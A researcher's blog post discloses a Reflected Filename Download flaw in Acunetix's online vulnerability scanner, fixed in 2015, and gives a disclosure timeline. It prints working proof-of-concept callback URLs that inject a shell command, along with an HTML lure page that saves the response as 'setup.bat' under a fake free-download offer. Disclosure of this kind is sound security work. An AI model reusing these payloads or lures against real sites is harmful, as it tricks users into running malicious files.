After publishing a report on a security software – OWASP ZAP – I found another vulnerability on a security company – Acunetix.
Reminds the proverbial saying:
Shoemaker’s son always goes barefoot.
I found a way to trick users into downloading a batch [executable] file that comes from ovs.acunetix.com using a Reflected Filename Download vulnerability.
It was funny how I found this one. I noticed that Acunetix allowed to test vulnerabilities online and I was curious about that web appplication. I register for a demo account and noticed lot’s of XHR requests on my Google Inspector. So I decided to give RFD a try…
This security issue affected almost all XHR requests on ovs.acunetix.com – Acunetix Online Vulnerability Scanner. Every request allowed a user to inject a callback with special characters that would allowed me to launch a possible attack.
Take this example:
https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||
Which reflects on the screen:
start chrome davidsopas.com/poc/malware.htm||({“message”: “get:sgn:invalid size”, “data”: null, “error”: “bad-input”});
It didn’t give any HTTP error:
Request URL:https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Request Method:GET
Status Code:200 OK
Remote Address:54.209.55.15:443
So I was able to inject a callback that even giving an error on the JSON information it didn’t return a HTTP error.
Because I couldn’t control the filename and force a download I needed to use the HTML5 download attribute.
[code language=”html”]
<div align="center">
<a href="https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;">
<img src="https://www.davidsopas.com/poc/Acunetix_1.jpg" border="0" />
</a>
<h1>Download Acunetix Web Security Scanner for Free!</h1>
<p><i>(Use "Save link as" to download the file)</i></p>
</div>
[/code]
As I said before it happened in almost every XHR requests:
https://ovs.acunetix.com/rpc/scans/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/scans/list?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/licenses/get?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Possible attack scenario:
Because this file can be accessed without authentication a malicious user could use this to attack any user.
- Malicious user creates a specially crafted page – similar to my proof-of-concept – promising to download Acunetix web security software.
- Victims clicks to download the file [even if the victim checks the source-code of the page they would see the trusted source – acunetix.com]
- Victims runs the file and gets hijacked
Acunetix security team fixed this vulnerability very fast proving that they’re on top of things. I wish I could to see other companies follow Acunetix patching timeline.
Timeline:
17-09-2015 Reported to Acunetix
17-09-2015 Acunetix acknowledged the vulnerability
18-09-2015 Acunetix informed me that they fix this security issue
22-09-2015 Full disclosure
One Reply to “Acunetix got RFDed!”